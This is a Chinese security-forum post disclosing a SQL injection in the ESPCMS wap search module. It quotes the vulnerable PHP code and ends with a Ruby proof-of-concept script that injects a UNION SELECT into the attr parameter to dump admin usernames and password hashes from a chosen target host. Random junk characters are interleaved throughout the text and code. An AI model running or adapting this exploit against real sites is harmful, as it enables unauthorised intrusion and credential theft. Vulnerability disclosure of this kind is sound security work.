中国网络渗透测试联盟
标题:
espcms wap模块搜索处SQL注入
[打印本页]
作者:
admin
时间:
2013-7-27 18:31
标题:
espcms wap模块搜索处SQL注入
0×0 漏洞概述0×1 漏洞细节
7 r# n8 `% R& }% P9 e' W: U) o2 U
0×2 PoC
2 T1 {' R( Y! B0 E
- t" _, J3 t- F
* ~8 Z: q W/ A, R
$ E& D7 A- a# m3 l& I0 t
0×0 漏洞概述
! s- b7 }/ Y" S. j V L( U0 |) \
8 Z* {' \. E' Q) ?
易思ESPCMS企业网站管理系统基于LAMP开发构建的企业网站管理系统,它具有操作简单、功能强大、稳定性好、扩展性及安全性强、二次开发及后期维护方便,可以帮您迅速、轻松地构建起一个强大专业的企业网站。
' j2 B) M# A9 @" l3 K$ t1 U( L1 v9 w
其在处理传入的参数时考虑不严谨导致
SQL注入
发生
$ x1 [2 F( i T. G' r- e
" }0 L: U5 Z, _
b9 C8 K& h r: y5 {1 k2 A2 _
0×1 漏洞细节
! |8 u8 a* ]6 G8 T3 T h! Z( D8 M& e
. B, x6 F: Z u- E4 r
变量的传递过程是$_SERVER['QUERY_STRING']->$urlcode->$output->$value->$db_where->$sql->mysql_query,整个过程无过滤导致了注入的发生。
) ]- p' Z* G& t: u
正因为变量是从$_SERVER['QUERY_STRING']中去取的,所以正好避开了程序的过滤。
5 r+ k% o4 [; Q6 |$ s% J
而注入的变量是数组的值,并非数组的key,所以也没过被过滤,综合起来形成了一个比较少见的
SQL注入
。
3 e# O3 {0 @; M" V
. |/ K% u8 s3 @/ A
在/interface/3gwap_search.php文件的in_result函数中:
' F& C# V0 @ l
! J! s7 ]& N: s8 M# F
- V' b/ h& Z% j" H. o
1 s* B3 m+ d5 w8 d. G4 Y. G8 F
function in_result() {
0 C+ l' d' x& j( L* [6 R/ T$ m
... ... ... ... ... ... ... ... ...
) }5 \3 M5 j+ t# l- Z6 q" y
$urlcode = $_SERVER[ 'QUERY_STRING '];
% s3 z0 P, | j8 r, g/ |3 q6 ~
parse_str(html_entity_decode($urlcode), $output);
1 G( h* k7 O8 m" k J
4 [; H, [- {7 _( [' g
... ... ... ... ... ... ... ... ...
( o( s5 x) s! t
if (is_array($output['attr' ]) && count($output['attr']) > 0) {
- A/ \6 c/ H( h& [( Y( z4 ~
0 \3 X5 y3 @8 o) s7 Z& W
$db_table = db_prefix . 'model_att';
3 \! m ^0 I6 k6 o1 X1 t
) Y; T o0 ?3 h0 G
foreach ($output['attr' ] as $key => $value) {
6 [7 n( I) H. N
if ($value) {
1 m. n' [2 J* v% b1 h; @* T* N
" Y; t$ @5 |6 ~" r: [
$key = addslashes($key);
4 W) P; w- H8 ~6 l7 ~% D. c2 n
$key = $this-> fun->inputcodetrim($key);
/ _! J. Y0 G/ X: A) Y4 _; Z
$db_att_where = " WHERE isclass=1 AND attrname='$key'";
: Y) ~: H' k# O& J1 p9 Z. t; s8 H% V+ o
$countnum = $this->db_numrows($db_table, $db_att_where);
- _2 d7 p7 @& N& J$ J, W, ~5 i, v7 r
if ($countnum > 0) {
4 j! y( M. D1 j7 b
$db_where .= ' AND b.' . $key . '=\'' . $value . '\'' ;
+ A; n. f1 w8 n* z C
}
z/ |5 b' ?7 R0 Z1 `
}
- }# j* o) Y( o3 l' ~, ?
}
- F9 `" r# X, |% y. M7 m; c
}
% E$ H6 y7 L2 j$ A( j
if (!empty ($keyword) && empty($keyname)) {
, d; R- p E/ t6 d" y' K" T+ `
$keyname = 'title';
9 ^* O! V8 D& R! }. K1 @' Q
$db_where.= " AND a.title like '%$keyword%'" ;
4 r; v7 l1 x3 T- Q# G
} elseif (!empty ($keyword) && !empty($keyname)) {
* N$ H/ c0 V+ n1 l% h1 v* T- W
$db_where.= " AND $keyname like '% $keyword%'";
2 z/ r' P0 }3 M. V/ k" V, n
}
: v/ p" [, B, F/ o
$pagemax = 15;
. q/ L+ t8 {: [, @5 a( Z% [
% ?: s$ u3 X1 g @6 L" V
$pagesylte = 1;
5 j9 f' j9 c8 @0 ~6 g# M3 Z
! g" n1 N/ W5 \
if ($countnum > 0) {
. ~/ R5 ?7 T3 F9 m# u/ ?
* K9 `6 M# t+ @% u& J4 C
$numpage = ceil($countnum / $pagemax);
5 B2 W1 b% D6 g7 J0 {) @
} else {
; C D4 p' ~* {4 Q
$numpage = 1;
! Z8 a" Y7 l0 k
}
* L( G0 S! u- z
$sql = "SELECT b.*,a.* FROM " . db_prefix . "document AS a LEFT JOIN " . db_prefix . "document_attr AS b ON a.did=b.did " . $db_where . ' LIMIT 0,' . $pagemax;
3 i7 A+ w) x3 P
$this-> htmlpage = new PageBotton($sql, $pagemax, $page, $countnum, $numpage, $pagesylte, $this->CON ['file_fileex' ], 5, $this->lng['pagebotton' ], $this->lng['gopageurl'], 0);
. M+ c% v0 X$ f' u; _
$sql = $this-> htmlpage->PageSQL('a.did' , 'down' ); $rs = $this->db->query($sql);
* y ]6 e& R$ f* W2 R5 c1 j; d
... ... ... ... ... ... ... ... ...
: O0 ^# w0 |$ }( }3 W
}
* g. k: x; p. A, m+ w3 A) h( V
8 W% j) C( ]: ]% @9 O4 I( v; N: \
6 p3 d4 k8 T1 I' F+ W
0×2 PoC
( o* S' a; V7 v( j& [. [
2 C9 x0 L4 P- C( i% C
* i, S) A7 G8 I% H( I7 e% S
9 ]6 p: [/ `, Z' m" F+ v4 U2 `7 [
require "net/http"
4 h# I9 I4 ?1 Q# k2 x8 {
( l# |. x9 H. D! |& Z# k
def request(method, url)
- d9 l* O# {* n1 q$ A$ a" f: [
if method.eql?("get")
, O+ F* ^/ c/ |, Y
uri = URI.parse(url)
3 s+ U+ U# Q+ Z* [
http = Net::HTTP.new(uri.host, uri.port)
3 @7 [/ E+ u# q
response = http.request(Net::HTTP::Get.new(uri.request_uri))
$ g" E8 j' B) B4 o" N# [+ t
return response
1 p' s) k% S" x& \# m4 z
end
$ u- i" _, s7 r0 l" M9 u
end
7 L/ w7 y p- o/ y9 R
7 N1 i5 K+ a+ N5 d4 T$ |) M
doc =<<HERE
6 @3 o1 ~; G$ ?) E
-------------------------------------------------------
- B. ~" k ^' f" G a
Espcms Injection Exploit
& o3 q& ^& W: Q6 r
Author:ztz
* T- ]4 P8 L3 k
Blog:
http://ztz.fuzzexp.org/
' {+ v+ ?4 X1 u; c' I U
-------------------------------------------------------
/ z% M0 Z* x; h
7 l7 |5 R+ j+ `" c% I9 p6 D
HERE
7 U# {$ [& R1 f& ?
?+ q4 N B5 R4 o- E' c) p& Q7 s
usage =<<HERE
. c( K" r( `7 S1 P
Usage: ruby #{$0} host port path
* O1 D1 \& l! d7 u) [& B1 ~
example: ruby #{$0}
www.target.com
80 /
" \& \: O+ `' l) i
HERE
& f! ?9 E9 x- I; w
a2 J0 Z% |6 i: ?1 ]3 \9 V
puts doc
" X2 i5 a |& D$ [
if ARGV.length < 3
/ x- [! |8 @" F' r
puts usage
- X! V5 o0 W9 y. L
else
" B, v; D, r: o1 ?
$host = ARGV[0]
$ `/ b7 @1 n i* [3 c( h
$port = ARGV[1]
7 P; n. I9 B& I! L1 [0 h- p. U; z
$path = ARGV[2]
, [) V5 J7 I8 c' |
9 F$ m- ^# E7 ^8 n5 W
puts "
send request..."
8 H( c! B' g2 o
url = "http://#{$host}:#{$port}#{$path}wap/index.php?ac=search&at=result&lng=cn&mid=3&tid=11&keyword=1&keyname=a.title&countnum=1&
2 K6 ~$ d# h7 U+ u0 ~/ O
attr[jobnum]=1%27%20and%201=2%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13
, v$ N3 f+ b0 D' X4 y% i* D: m( Q
,14,15,16,17,18,19,20,21,22,23,24,25,concat%28username,CHAR%2838%29,password%29,27
) D; S3 V5 E+ \% O7 h: J
,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45%20from%20espcms_admin_member;%23"
( c# f1 F# f/ ]3 q3 E- H; `3 N
response = request("get", url)
5 \* B- s4 t" Z5 \3 _' L* ~$ h' G5 ?( S
result = response.body.scan(/\w+&\w{32}/)
* w: ^: G- x$ `+ f9 K+ [
puts result
* k& K1 K' Q" d
end
$ o r# A$ @- u! [- o5 E V
' K! @, X$ W2 } z
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2